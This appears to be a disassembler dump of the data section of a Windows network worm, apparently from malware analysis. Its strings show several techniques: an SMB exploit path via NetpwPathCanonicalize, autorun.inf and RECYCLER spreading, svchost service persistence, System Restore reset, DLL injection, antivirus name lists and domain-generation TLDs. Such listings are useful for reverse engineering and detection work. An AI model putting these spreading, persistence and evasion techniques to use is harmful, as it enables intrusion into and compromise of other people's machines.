align 4
aComputerassoci db 'computerassociates',0 ; DATA XREF: .text:009BA430�o
align 4
aNetworkassocia db 'networkassociates',0 ; DATA XREF: .text:009BA42C�o
align 4
aEtrust db 'etrust',0 ; DATA XREF: .text:009BA428�o
align 4
aPanda db 'panda',0 ; DATA XREF: .text:009BA424�o
align 4
aSophos db 'sophos',0 ; DATA XREF: .text:009BA420�o
align 4
aTrendmicro db 'trendmicro',0 ; DATA XREF: .text:009BA41C�o
align 10h
aMcafee db 'mcafee',0 ; DATA XREF: .text:009BA418�o
align 4
aNorton db 'norton',0 ; DATA XREF: .text:009BA414�o
align 10h
aSymantec db 'symantec',0 ; DATA XREF: .text:009BA410�o
align 4
aMicrosoft db 'microsoft',0 ; DATA XREF: .text:009BA40C�o
align 4
aDefender db 'defender',0 ; DATA XREF: .text:009BA408�o
align 4
aRootkit db 'rootkit',0 ; DATA XREF: .text:009BA404�o
aMalware db 'malware',0 ; DATA XREF: .text:009BA400�o
aSpyware db 'spyware',0 ; DATA XREF: .text:009BA3FC�o
aVirus db 'virus',0 ; DATA XREF: .text:off_9BA3F8�o
align 4
; IID stru_9A3E64
stru_9A3E64 dd 304CE942h ; Data1 ; DATA XREF: sub_9A9DE7+1E�o
dw 6E39h ; Data2
dw 40D8h ; Data3
db 94h, 3Ah, 0B9h, 13h, 0C4h, 0Ch, 9Ch, 0D4h; Data4
; IID stru_9A3E74
stru_9A3E74 dd 0F7898AF5h ; Data1 ; DATA XREF: sub_9A9DE7+15�o
dw 0CAC4h ; Data2
dw 4632h ; Data3
db 0A2h, 0ECh, 0DAh, 6, 0E5h, 11h, 1Ah, 0F2h; Data4
; IID stru_9A3E84
stru_9A3E84 dd 0CA545C6h ; Data1 ; DATA XREF: sub_9A9ED0+72�o
dw 37ADh ; Data2
dw 4A6Ch ; Data3
db 0BFh, 92h, 9Fh, 76h, 10h, 6, 7Eh, 0F5h; Data4
; IID stru_9A3E94
stru_9A3E94 dd 0E0483BA0h ; Data1 ; DATA XREF: sub_9A9ED0+6A�o
dw 47FFh ; Data2
dw 4D9Ch ; Data3
db 0A6h, 0D6h, 77h, 41h, 0D0h, 0B1h, 95h, 0F7h; Data4
; char a08x08x[]
a08x08x db '%08x%08x',0 ; DATA XREF: sub_9AA064+74�o
align 10h
stru_9A3EB0 _msEH <0FFFFFFFFh, offset loc_9AA177, offset loc_9AA17B>
; DATA XREF: sub_9AA0F1+2�o
; char aTcp[]
aTcp db 'TCP',0 ; DATA XREF: sub_9AA18B+A6�o
; sub_9AA320+90�o
; char aD[]
aD db '%d',0 ; DATA XREF: sub_9AA18B+1C�o
; sub_9B644D+11F�o ...
align 8
stru_9A3EC8 _msEH <0FFFFFFFFh, offset loc_9AA26A, offset loc_9AA26E>
; DATA XREF: sub_9AA18B+5�o
align 8
stru_9A3ED8 _msEH <0FFFFFFFFh, offset loc_9AA30C, offset loc_9AA310>
; DATA XREF: sub_9AA27B+5�o
; char aU[]
aU db '%u',0 ; DATA XREF: sub_9AA320+2A�o
; sub_9AA320+A3�o ...
align 4
stru_9A3EE8 _msEH <0FFFFFFFFh, offset loc_9AA44F, offset loc_9AA453>
; DATA XREF: sub_9AA320+5�o
aHttpWww_getmyi db 'http://www.getmyip.org',0 ; DATA XREF: .text:009BA4F4�o
align 4
aHttpWww_whatsm db 'http://www.whatsmyipaddress.com',0 ; DATA XREF: .text:009BA4F0�o
aHttpWww_whatis db 'http://www.whatismyip.org',0 ; DATA XREF: .text:009BA4EC�o
align 4
aHttpCheckip_dy db 'http://checkip.dyndns.org',0 ; DATA XREF: .text:009BA4E8�o
align 4
; char SubStr[]
SubStr db 'ip address',0 ; DATA XREF: sub_9AA463+7E�o
align 10h
stru_9A3F70 _msEH <0FFFFFFFFh, offset loc_9AA55E, offset loc_9AA562>
; DATA XREF: sub_9AA463+2�o
align 10h
stru_9A3F80 _msEH <0FFFFFFFFh, offset loc_9AA60E, offset loc_9AA612>
; DATA XREF: sub_9AA572+2�o
; char aHttpD_D_D_DDS[]
aHttpD_D_D_DDS db 'http://%d.%d.%d.%d:%d/%s',0 ; DATA XREF: sub_9AA646+2A�o
; sub_9AFEDD+3B�o
align 4
; char aSIpc_0[]
aSIpc_0 db '\\%s\IPC$',0 ; DATA XREF: sub_9AA736+12�o
; sub_9AABAE+12E�o
align 4
aAaa: ; DATA XREF: sub_9AA799+55�o
unicode 0, <AAA>,0
aS_0 db 'S',0 ; DATA XREF: sub_9AA799+50�o
aVivivivi db 'V‰V‰V‰V‰',0
align 4
aM db 'M',0 ; DATA XREF: sub_9AA799+4B�o
aVivi db 'V‰V‰',0
align 10h
; unsigned __int8 ProtSeq
ProtSeq db 'ncacn_np',0 ; DATA XREF: sub_9AA799+1F�o
; sub_9AA82D+22�o
align 10h
stru_9A3FE0 _msEH <0FFFFFFFFh, offset loc_9AA804, offset loc_9AA812>
; DATA XREF: sub_9AA799+2�o
; unsigned __int8 Endpoint
Endpoint dd 7069705Ch, 72735C65h, 63767376h, 0 ; DATA XREF: sub_9AABAE+98�o
aHhdhh: ; DATA XREF: sub_9AA82D+7D�o
unicode 0, <HHDHH>,0
asc_9A4008: ; DATA XREF: sub_9AA82D+69�o
; sub_9AA8E9+B7�o
unicode 0, <\>,0
align 10h
stru_9A4010 _msEH <0FFFFFFFFh, offset loc_9AA8C0, offset loc_9AA8CE>
; DATA XREF: sub_9AA82D+5�o
; unsigned __int8 dword_9A401C
dword_9A401C dd 7069705Ch, 72625C65h, 6573776Fh, 72h ; DATA XREF: sub_9AA8E9+25C�o
dword_9A402C dd 0B6244A92h, 37F50397h, 0 ; DATA XREF: sub_9AA8E9+234�o
a____: ; DATA XREF: sub_9AA8E9+10D�o
unicode 0, <\..\..\>,0
; char aD_D_D_D[]
aD_D_D_D db '\\%d.%d.%d.%d',0 ; DATA XREF: sub_9AA8E9+21�o
align 4
; char aD_D_D_D_0[]
aD_D_D_D_0 db '%d.%d.%d.%d',0 ; DATA XREF: sub_9AABAE+2D�o
; wchar_t a__
a__: ; DATA XREF: sub_9AAD09+1D�o
unicode 0, <\..\>,0
align 10h
stru_9A4070 _msEH <0FFFFFFFFh, offset loc_9AAD50, offset loc_9AAD54>
; DATA XREF: sub_9AAD09+2�o
align 10h
stru_9A4080 _msEH <0FFFFFFFFh, offset loc_9AADBC, offset loc_9AADC0>
; DATA XREF: sub_9AADA0+2�o
align 10h
stru_9A4090 _msEH <0FFFFFFFFh, offset loc_9AAE44, offset loc_9AAE48>
; DATA XREF: sub_9AAE1D+2�o
align 10h
stru_9A40A0 _msEH <0FFFFFFFFh, offset loc_9AAEFF, offset loc_9AAF03>
; DATA XREF: sub_9AAE90+5�o
align 10h
stru_9A40B0 _msEH <0FFFFFFFFh, offset loc_9AAF95, offset loc_9AAF99>
; DATA XREF: sub_9AAF4B+5�o
align 10h
stru_9A40C0 _msEH <0FFFFFFFFh, offset loc_9AB034, offset loc_9AB038>
; DATA XREF: sub_9AAFE1+5�o
align 10h
stru_9A40D0 _msEH <0FFFFFFFFh, offset loc_9AB11C, offset loc_9AB120>
; DATA XREF: sub_9AB07D+5�o
align 10h
stru_9A40E0 _msEH <0FFFFFFFFh, 0, offset nullsub_1> ; DATA XREF: sub_9AB130+2�o
align 10h
_msEH <0FFFFFFFFh, offset loc_9AB285, offset loc_9AB289>
; DATA XREF: sub_9AB1C8+5�o
align 10h
stru_9A4100 _msEH <0FFFFFFFFh, offset loc_9AB3E8, offset loc_9AB3EC>
; DATA XREF: sub_9AB2C9+2�o
; char dword_9A410C[]
dword_9A410C dd 6174656Eh, 32336970h, 6C6C642Eh, 0 ; DATA XREF: sub_9AB47D+F�o
; char aNetpwpathcanon[]
aNetpwpathcanon db 'NetpwPathCanonicalize',0 ; DATA XREF: sub_9AB47D+A�o
align 4
; char aNtdll_dll[]
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_9AB49A+F�o
; sub_9ACC9F+B8�o ...
align 10h
; char aNtqueryinforma[]
aNtqueryinforma db 'NtQueryInformationProcess',0 ; DATA XREF: sub_9AB49A+A�o
; sub_9ACEC5+8�o ...
align 4
; char aQuery_main[]
aQuery_main db 'Query_Main',0 ; DATA XREF: sub_9AB4B7+56�o
align 4
; char aDnsquery_w[]
aDnsquery_w db 'DnsQuery_W',0 ; DATA XREF: sub_9AB4B7+3F�o
align 4
; char aDnsquery_utf8[]
aDnsquery_utf8 db 'DnsQuery_UTF8',0 ; DATA XREF: sub_9AB4B7+28�o
align 4
; char aDnsapi_dll[]
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_9AB4B7+13�o
align 10h
; char aDnsquery_a[]
aDnsquery_a db 'DnsQuery_A',0 ; DATA XREF: sub_9AB4B7+E�o
align 4
; char aWs2_32_dll[]
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_9AB535+24�o
align 4
; char aSendto[]
aSendto db 'sendto',0 ; DATA XREF: sub_9AB535+1F�o
align 10h
; char ModuleName[]
ModuleName db 'dnsrslvr.dll',0 ; DATA XREF: sub_9AB535�o
align 10h
; const WCHAR aSvchost_exeKNe
aSvchost_exeKNe: ; DATA XREF: sub_9AB567:loc_9AB56A�o
unicode 0, <svchost.exe -k NetworkService>,0
; char asc_9A41FC[]
asc_9A41FC db ' ',0 ; DATA XREF: sub_9AB5CF:loc_9AB5E2�o
; sub_9AB6D6:loc_9AB711�o
align 10h
; char asc_9A4200[]
asc_9A4200 db 0Dh,0Ah,0 ; DATA XREF: sub_9AB63B:loc_9AB660�o
; sub_9AF7D5+1FC�o
align 4
asc_9A4204: ; DATA XREF: sub_9AB63B:loc_9AB659�o
dw 0Dh
unicode 0, <>,0
asc_9A4208: ; DATA XREF: sub_9AB63B+17�o
dw 0Ah
unicode 0, <>,0
; char asc_9A420C[]
asc_9A420C db ';',0 ; DATA XREF: sub_9AB6D6:loc_9AB723�o
align 10h
; char asc_9A4210[]
asc_9A4210 db '=',0 ; DATA XREF: sub_9AB7A5+7C�o
; sub_9AB855+154�o
align 4
; char asc_9A4214[]
asc_9A4214 db ']',0 ; DATA XREF: sub_9AB7A5+3A�o
; sub_9AB855+93�o
align 4
asc_9A4218: ; DATA XREF: sub_9AB7A5+A�o
; sub_9AB855+6C�o
unicode 0, <[>,0
a4_0 db ',4',0 ; DATA XREF: sub_9AB855+1B4�o
align 10h
aSystem32Shell3 db '\system32\shell32.dll',0 ; DATA XREF: sub_9AB855+1A4�o
align 4
aWindir db '%windir%',0 ; DATA XREF: sub_9AB855+198�o
align 4
aSystemroot db '%systemroot%',0 ; DATA XREF: sub_9AB855+191�o
align 4
aAutorun db 'autorun',0 ; DATA XREF: sub_9AB855+80�o
aUseautoplay1 db 'useautoplay=1',0 ; DATA XREF: sub_9AB855+3A�o
align 4
; char aIcon[]
aIcon db 'icon',0 ; DATA XREF: sub_9AB855+1E�o
; sub_9AB855:loc_9AB9CE�o
align 4
; char aAction[]
aAction db 'action',0 ; DATA XREF: sub_9AB855+16�o
; sub_9AB855:loc_9ABA10�o
align 4
aOpen db 'open',0 ; DATA XREF: sub_9AB855+11�o
align 4
aShellexecute db 'shellexecute',0 ; DATA XREF: sub_9AB855+7�o
align 4
aRundll32 db 'rundll32',0 ; DATA XREF: sub_9ABA9B+41�o
align 10h
stru_9A42A0 _msEH <0FFFFFFFFh, offset loc_9ABB72, offset loc_9ABB76>
; DATA XREF: sub_9ABA9B+2�o
; char a_SSS_SS[]
a_SSS_SS db '.\%s\%s\%s.%s,%s',0 ; DATA XREF: sub_9ABB9F+3D8�o
align 10h
; char aSautorun_inf[]
aSautorun_inf db '%sautorun.inf',0 ; DATA XREF: sub_9ABB9F+345�o
align 10h
; char aSS_1[]
aSS_1 db '%s\%s',0 ; DATA XREF: sub_9ABB9F+27C�o
align 4
; char aSS_0[]
aSS_0 db '%s%s',0 ; DATA XREF: sub_9ABB9F+21D�o
align 10h
; char aSSSS_S[]
aSSSS_S db '%s%s\%s\%s.%s',0 ; DATA XREF: sub_9ABB9F+1B9�o
align 10h
; char aSDDDDDDDDDDDDD[]
aSDDDDDDDDDDDDD db 'S-%d-%d-%d-%d%d%d-%d%d%d-%d%d%d-%d',0 ; DATA XREF: sub_9ABB9F+13E�o
align 4
; char aRecycler[]
aRecycler db 'RECYCLER',0 ; DATA XREF: sub_9ABB9F+B1�o
align 10h
; char aDll_0[]
aDll_0 db 'dll',0 ; DATA XREF: sub_9ABB9F+86�o
align 8
stru_9A4328 _msEH <0FFFFFFFFh, offset loc_9ABFAA, offset loc_9ABFAE>
; DATA XREF: sub_9ABB9F+5�o
; char aExplorerS[]
aExplorerS db 'explorer %s',0 ; DATA XREF: sub_9AC1ED+A2�o
; char a__0[]
a__0 db '.',0 ; DATA XREF: sub_9AC1ED+8E�o
align 8
; char aSoftwareMicr_0[]
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folde'
; DATA XREF: sub_9AC1ED+14�o
db 'r\Hidden\SHOWALL',0
align 4
; char aCheckedvalue[]
aCheckedvalue db 'CheckedValue',0 ; DATA XREF: sub_9AC1ED+F�o
align 4
; char aOpenFolderToVi[]
aOpenFolderToVi db 'Open folder to view files',0 ; DATA XREF: sub_9AC2BE:loc_9AC2FC�o
align 4
; char aShell32_dll[]
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_9AC2BE+7�o
; char aKernel32_dll[]
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_9AC6A4+18�o
; sub_9ACC9F+5A�o ...
align 4
; char aThread08xStatu[]
aThread08xStatu db 'thread: %08x, status: %08x',0Ah,0 ; DATA XREF: sub_9ACC9F+148�o
; char aLoadlibraryexa[]
aLoadlibraryexa db 'LoadLibraryExA',0 ; DATA XREF: sub_9ACC9F+CD�o
align 10h
; char aNtqueueapcthre[]
aNtqueueapcthre db 'NtQueueApcThread',0 ; DATA XREF: sub_9ACC9F:loc_9ACD52�o
align 4
; char ProcName[]
ProcName db 'LoadLibraryA',0 ; DATA XREF: sub_9ACC9F+55�o
align 4
; char aNtsetinformati[]
aNtsetinformati db 'NtSetInformationProcess',0 ; DATA XREF: sub_9ACFF6+24�o
align 10h
stru_9A4450 _msEH <0FFFFFFFFh, offset loc_9AD247, offset loc_9AD24B>
; DATA XREF: sub_9AD15E+2�o
dd 7073796Dh, 2E656361h, 6D6F63h ; DATA XREF: .text:009BAAC4�o
dd 2E6E736Dh, 6D6F63h ; DATA XREF: .text:009BAAC0�o
; .text:009BAD34�o
dd 79616265h, 6D6F632Eh, 0 ; DATA XREF: .text:009BAABC�o
dword_9A447C dd 2E6E6E63h, 6D6F63h ; DATA XREF: .text:009BAAB8�o
dword_9A4484 dd 2E6C6F61h, 6D6F63h ; DATA XREF: .text:off_9BAAB4�o
; char aHttpWww_S[]
aHttpWww_S db 'http://www.%s',0 ; DATA XREF: sub_9AD58F+20�o
; sub_9AEC85+2C�o
align 10h
stru_9A44A0 _msEH <0FFFFFFFFh, offset loc_9AD811, offset loc_9AD815>
; DATA XREF: sub_9AD6D4+2�o
align 10h
stru_9A44B0 _msEH <0FFFFFFFFh, offset loc_9ADA12, offset loc_9ADA16>
; DATA XREF: sub_9AD8BC+2�o
; char aN08x08x08x[]
aN08x08x08x db 'n%08x%08x%08x',0 ; DATA XREF: sub_9ADA44+A2�o
align 4
; char aW08x08x08x[]
aW08x08x08x db 'w%08x%08x%08x',0 ; DATA XREF: sub_9ADBF1+310�o
; sub_9ADBF1+4B3�o
align 4
; char aL08x08x08x[]
aL08x08x08x db 'l%08x%08x%08x',0 ; DATA XREF: sub_9ADBF1+9C�o
; sub_9ADBF1+433�o
align 4
aWindows_0: ; DATA XREF: .text:009BAB18�o
unicode 0, <Windows>,0
aUpdate: ; DATA XREF: .text:009BAB14�o
unicode 0, <Update>,0
align 4
aUniversal: ; DATA XREF: .text:009BAB10�o
unicode 0, <Universal>,0
aTime: ; DATA XREF: .text:009BAB0C�o
unicode 0, <Time>,0
align 4
aTask: ; DATA XREF: .text:009BAB08�o
unicode 0, <Task>,0
align 4
aSystem_0: ; DATA XREF: .text:009BAB04�o
unicode 0, <System>,0
align 4
aSupport: ; DATA XREF: .text:009BAB00�o
unicode 0, <Support>,0
aShell: ; DATA XREF: .text:009BAAFC�o
unicode 0, <Shell>,0
aServer_0: ; DATA XREF: .text:009BAAF8�o
unicode 0, <Server>,0
align 4
aSecurity_0: ; DATA XREF: .text:009BAAF4�o
unicode 0, <Security>,0
align 4
aNetwork: ; DATA XREF: .text:009BAAF0�o
unicode 0, <Network>,0
aMonitor_0: ; DATA XREF: .text:009BAAEC�o
unicode 0, <Monitor>,0
aMicrosoft_0: ; DATA XREF: .text:009BAAE8�o
unicode 0, <Microsoft>,0
aManager_0: ; DATA XREF: .text:009BAAE4�o
unicode 0, <Manager>,0
aInstaller: ; DATA XREF: .text:009BAAE0�o
unicode 0, <Installer>,0
aImage: ; DATA XREF: .text:009BAADC�o
unicode 0, <Image>,0
aHelper: ; DATA XREF: .text:009BAAD8�o
unicode 0, <Helper>,0
align 4
aDriver: ; DATA XREF: .text:009BAAD4�o
unicode 0, <Driver>,0
align 4
aConfig: ; DATA XREF: .text:009BAAD0�o
unicode 0, <Config>,0
align 4
aCenter: ; DATA XREF: .text:009BAACC�o
unicode 0, <Center>,0
align 4
aBoot: ; DATA XREF: .text:009BAAC8�o
unicode 0, <Boot>,0
align 4
; char aResetsr[]
aResetsr db 'ResetSR',0 ; DATA XREF: sub_9AE140+22�o
; char LibFileName[]
LibFileName db 'srclient.dll',0 ; DATA XREF: sub_9AE140+C�o
align 10h
stru_9A4650 _msEH <0FFFFFFFFh, offset loc_9AE17B, offset loc_9AE17F>
; DATA XREF: sub_9AE140+2�o
align 10h
dword_9A4660 dd 0FFFFFFFFh, 9AE375h, 9AE379h, 0 ; DATA XREF: sub_9AE195+5�o
stru_9A4670 _msEH <0FFFFFFFFh, offset loc_9AE464, offset loc_9AE468>
; DATA XREF: sub_9AE3A4+2�o
align 10h
aSoftwareMicr_1: ; DATA XREF: sub_9AE520+F�o
unicode 0, <SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost>,0
align 4
; const WCHAR aServicedll
aServicedll: ; DATA XREF: sub_9AE641+1B9�o
unicode 0, <ServiceDll>,0
align 4
; const WCHAR SubKey
SubKey: ; DATA XREF: sub_9AE641+196�o
unicode 0, <Parameters>,0
align 4
; const WCHAR aDescription
aDescription: ; DATA XREF: sub_9AE641+17E�o
unicode 0, <Description>,0
; const WCHAR aObjectname
aObjectname: ; DATA XREF: sub_9AE641+163�o
unicode 0, <ObjectName>,0
align 4
; BYTE Data
Data: ; DATA XREF: sub_9AE641+15B�o
unicode 0, <LocalSystem>,0
; const WCHAR aImagepath
aImagepath: ; DATA XREF: sub_9AE641+14F�o
unicode 0, <ImagePath>,0
; const WCHAR aErrorcontrol
aErrorcontrol: ; DATA XREF: sub_9AE641+131�o
unicode 0, <ErrorControl>,0
align 4
; const WCHAR aStart
aStart: ; DATA XREF: sub_9AE641+117�o
unicode 0, <Start>,0
; const WCHAR aType
aType: ; DATA XREF: sub_9AE641+FD�o
unicode 0, <Type>,0
align 4
; const WCHAR ValueName
ValueName: ; DATA XREF: sub_9AE641+EA�o
unicode 0, <DisplayName>,0
align 8
aSystemCurrentc: ; DATA XREF: sub_9AE641+60�o
unicode 0, <SYSTEM\CurrentControlSet\Services\>,0
align 10h
aSystemrootSyst: ; DATA XREF: sub_9AE641+1C�o
unicode 0, <%SystemRoot%\system32\svchost.exe -k >,0
; char aSoftwareMicr_2[]
aSoftwareMicr_2 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_9AE850+19C�o
align 4
; char aRundll32_exe_0[]
aRundll32_exe_0 db 'rundll32.exe "%s",%s',0 ; DATA XREF: sub_9AE850+163�o
align 4
; wchar_t aNetsvcs
aNetsvcs: ; DATA XREF: sub_9AE850+F4�o
unicode 0, <netsvcs>,0
; wchar_t asc_9A48B4
asc_9A48B4: ; DATA XREF: sub_9AE850+A3�o
unicode 0, < >,0
a_biz db '.biz',0 ; DATA XREF: .text:009BAD8C�o
align 10h
a_info db '.info',0 ; DATA XREF: .text:009BAD88�o
align 4
a_org db '.org',0 ; DATA XREF: .text:009BAD84�o
align 10h
a_net db '.net',0 ; DATA XREF: .text:009BAD80�o
align 4
a_com db '.com',0 ; DATA XREF: .text:009BAD7C�o
align 10h
a_ws db '.ws',0 ; DATA XREF: .text:009BAD78�o
a_cn db '.cn',0 ; DATA XREF: .text:009BAD74�o
a_cc db '.cc',0 ; DATA XREF: .text:off_9BAD70�o
aDec db 'Dec',0 ; DATA XREF: .text:009BAD6C�o
aNov db 'Nov',0 ; DATA XREF: .text:009BAD68�o
aOct db 'Oct',0 ; DATA XREF: .text:009BAD64�o
aSep db 'Sep',0 ; DATA XREF: .text:009BAD60�o
aAug db 'Aug',0 ; DATA XREF: .text:009BAD5C�o
aJul db 'Jul',0 ; DATA XREF: .text:009BAD58�o
aJun db 'Jun',0 ; DATA XREF: .text:009BAD54�o
aMay db 'May',0 ; DATA XREF: .text:009BAD50�o
aApr db 'Apr',0 ; DATA XREF: .text:009BAD4C�o
aMar db 'Mar',0 ; DATA XREF: .text:009BAD48�o
aFeb db 'Feb',0 ; DATA XREF: .text:009BAD44�o
aJan db 'Jan',0 ; DATA XREF: .text:009BAD40�o
aW3_org db 'w3.org',0 ; DATA XREF: .text:009BAD3C�o
align 4
aAsk_com db 'ask.com',0 ; DATA XREF: .text:009BAD38�o
aYahoo_com db 'yahoo.com',0 ; DATA XREF: .text:009BAD30�o
align 4
aGoogle_com db 'google.com',0 ; DATA XREF: .text:009BAD2C�o
align 4
aBaidu_com db 'baidu.com',0 ; DATA XREF: .text:off_9BAD28�o
align 10h
; char Delim[]
Delim db ', ',0 ; DATA XREF: sub_9AEBA1+36�o
align 8
dbl_9A4958 dq 6.26454564e-1 ; DATA XREF: sub_9AED54+A6�r
; char aHttpSSearch?qD[]
aHttpSSearch?qD db 'http://%s/search?q=%d',0 ; DATA XREF: sub_9AEE25+15�o
align 4
stru_9A4978 _msEH <0FFFFFFFFh, offset loc_9AF0DF, offset loc_9AF0E3>
; DATA XREF: sub_9AEECE+5�o
align 8
unk_9A4988 db 81h ; ; DATA XREF: sub_9AF52D+5D�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 0
dword_9A49D4 dd 2F000000h, 424D53FFh, 72h, 4 dup(0) ; DATA XREF: sub_9AF52D+A7�o
dd 25C0000h, 0
dd 2000C00h, 4C20544Eh, 2E30204Dh, 3231h
dword_9A4A08 dd 49000000h, 424D53FFh, 73h, 4 dup(0) ; DATA XREF: sub_9AF52D+EF�o
dd 25C0000h, 0
dd 0FF0Dh, 2FFFF00h, 25C00h, 2 dup(0)
dd 1000000h, 0B000000h, 4D000000h, 4C430053h, 544E4549h
dd 0
; char aUnix[]
aUnix db 'unix',0 ; DATA XREF: sub_9AF52D:loc_9AF77C�o
align 10h
; char aWindows4_0[]
aWindows4_0 db 'windows 4.0',0 ; DATA XREF: sub_9AF52D:loc_9AF769�o
; char aWindows5_0[]
aWindows5_0 db 'windows 5.0',0 ; DATA XREF: sub_9AF52D:loc_9AF757�o
; char aWindows5_1[]
aWindows5_1 db 'windows 5.1',0 ; DATA XREF: sub_9AF52D:loc_9AF745�o
; char aServicePack2[]
aServicePack2 db 'service pack 2',0 ; DATA XREF: sub_9AF52D:loc_9AF71B�o
align 4
; char aWindowsServer2[]
aWindowsServer2 db 'windows server 2003',0 ; DATA XREF: sub_9AF52D:loc_9AF6FB�o
; char aServicePack[]
aServicePack db 'service pack',0 ; DATA XREF: sub_9AF52D:loc_9AF6E0�o
; sub_9AF52D:loc_9AF72D�o
align 4
; char aServicePack1[]
aServicePack1 db 'service pack 1',0 ; DATA XREF: sub_9AF52D+19E�o
; sub_9AF52D+1DC�o
align 4
aVista db 'vista',0 ; DATA XREF: sub_9AF52D+188�o
align 10h
stru_9A4AD0 _msEH <0FFFFFFFFh, offset loc_9AF796, offset loc_9AF79A>
; DATA XREF: sub_9AF52D+2�o
dd 676E70h ; DATA XREF: .text:009BADA4�o
aJpeg db 'jpeg',0 ; DATA XREF: .text:009BADA0�o
align 4
dword_9A4AE8 dd 666967h ; DATA XREF: .text:009BAD9C�o
dword_9A4AEC dd 706D62h ; DATA XREF: .text:off_9BAD98�o
; char aHttp1_0200OkPr[]
aHttp1_0200OkPr db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_9AF7D5+2DA�o
db 'Pragma: no-cache',0Dh,0Ah
db 'Content-Length: %u',0Dh,0Ah
db 'Content-Type: image/%s',0Dh,0Ah
db 0Dh,0Ah,0
align 4
; char aMacintosh[]
aMacintosh db 'macintosh',0 ; DATA XREF: sub_9AF7D5+24B�o
align 10h
; char aLinux[]
aLinux db 'linux',0 ; DATA XREF: sub_9AF7D5+23D�o
align 4
; char aLwp[]
aLwp db 'lwp::',0 ; DATA XREF: sub_9AF7D5+22F�o
align 10h
; char aWget[]
aWget db 'wget',0 ; DATA XREF: sub_9AF7D5+221�o
align 4
; char aWindowsNt5_[]
aWindowsNt5_ db 'windows nt 5.',0 ; DATA XREF: sub_9AF7D5+213�o
align 4
; char aUserAgent[]
aUserAgent db 0Dh,0Ah ; DATA XREF: sub_9AF7D5+1E9�o
db 'user-agent:',0
align 4
; char asc_9A4B88[]
asc_9A4B88 db 0Dh,0Ah ; DATA XREF: sub_9AF7D5:loc_9AF9A6�o
db 0Dh,0
; char aGetSHttp[]
aGetSHttp db 'get /%s http/',0 ; DATA XREF: sub_9AF7D5+75�o
align 10h
stru_9A4BA0 _msEH <0FFFFFFFFh, offset loc_9AFBE5, offset loc_9AFBE9>
; DATA XREF: sub_9AF7D5+5�o
align 10h
dword_9A4BB0 dd 44h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 3, 8A885D04h
; DATA XREF: .text:pStubDescriptor�o
dd 11C91CEBh, 8E89Fh, 6048102Bh, 2, 7 dup(0)
dd 48320000h, 0
dd 180000h, 400024h, 7080647h, 30003h, 0B0000h, 20000h
dd 4011Bh, 4800D6h, 80008h, 0C2150h, 1A0008h, 0E80010h
dd 140070h, 48320008h, 0
dd 140001h, 80008h, 3080547h, 1, 0B0000h, 20000h, 4010Bh
dd 4800EEh, 80008h, 0C2113h, 7000F4h, 80010h, 4832h, 20000h
dd 80010h, 4460008h, 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 700008h, 8000Ch, 4832h
dd 30000h, 24001Ch, 7470040h, 30708h, 3, 0Bh, 0B0002h
dd 20004h, 8011Bh, 48019Ch, 8000Ch, 102150h, 1A0008h, 0E80014h
dd 180070h, 48320008h, 0
dd 180004h, 80008h, 3080647h, 1, 0B0000h, 20000h, 4010Bh
dd 10B00EEh, 0EE0008h, 0C0048h, 21130008h, 1AE0010h, 140070h
dd 48320008h, 0
dd 180005h, 240024h, 5080646h, 10000h, 0B0000h, 20000h
dd 4010Bh, 4800EEh, 80008h, 0C010Bh, 1A01E8h, 0E80010h
dd 140070h, 48320008h, 0
dd 0C0006h, 80000h, 1080346h, 0
dd 0B0000h, 20000h, 4010Bh, 7000EEh, 80008h, 4832h, 70000h
dd 10h, 4460008h, 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 8010Bh, 7000EEh, 8000Ch, 4832h
dd 80000h, 24001Ch, 7470040h, 30708h, 3, 0Bh, 0B0002h
dd 20004h, 8011Bh, 4802BEh, 8000Ch, 102150h, 1A0008h, 0E80014h
dd 180070h, 48320008h, 0
a@:
dw 9
unicode 0, < $@>
dd 7080847h, 30003h, 0B0000h, 20000h, 4000Bh, 0B0002h
dd 20008h, 0C011Bh, 480350h, 80010h, 142150h, 1A0008h
dd 0E80018h, 1C0070h, 48320008h, 0
dd 14000Ah, 80010h, 3080547h, 1, 0B0000h, 20000h, 40048h
dd 480008h, 80008h, 0C2113h, 700362h, 80010h, 4832h, 0B0000h
dd 8000Ch, 3460008h, 108h, 0
dd 0Bh, 480002h, 80004h, 80070h, 48320008h, 0
dd 20000Ch, 400024h, 7080847h, 60006h, 0B0000h, 20000h
dd 4000Bh, 0B0002h, 20008h, 0C011Bh, 48057Ch, 80010h, 142150h
dd 1A0008h, 0E80018h, 1C0070h, 48320008h, 0
dd 10000Dh, 80000h, 1080446h, 0
dd 0B0000h, 20000h, 4000Bh, 0B0002h, 20008h, 0C0070h, 48320008h
dd 0
dd 14000Eh, 240024h, 5080546h, 30000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 58E0008h, 0C001Ah, 7000E8h, 80010h
dd 4832h, 0F0000h, 240018h, 6470040h, 70708h, 7, 0Bh, 11B0002h
dd 7CC0004h, 80048h, 21500008h, 8000Ch, 10001Ah, 7000E8h
dd 80014h, 4832h, 100000h, 80014h, 5470008h, 30308h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 21130008h, 7DE000Ch
dd 100070h, 48320008h, 0
dd 180011h, 240024h, 5080646h, 30000h, 0B0000h, 20000h
dd 4010Bh, 4800EEh, 80008h, 0C010Bh, 1A0828h, 0E80010h
dd 140070h, 48320008h, 0
dd 100012h, 80008h, 1080446h, 0
dd 0B0000h, 20000h, 4010Bh, 4800EEh, 80008h, 0C0070h, 48320008h
dd 0
dd 100013h, 80008h, 1080446h, 0
dd 0B0000h, 20000h, 4010Bh, 4800EEh, 80008h, 0C0070h, 48320008h
dd 0
dd 100014h, 240000h, 1080446h, 0
dd 0B0000h, 20000h, 4010Bh, 215000EEh, 80008h, 0C0070h
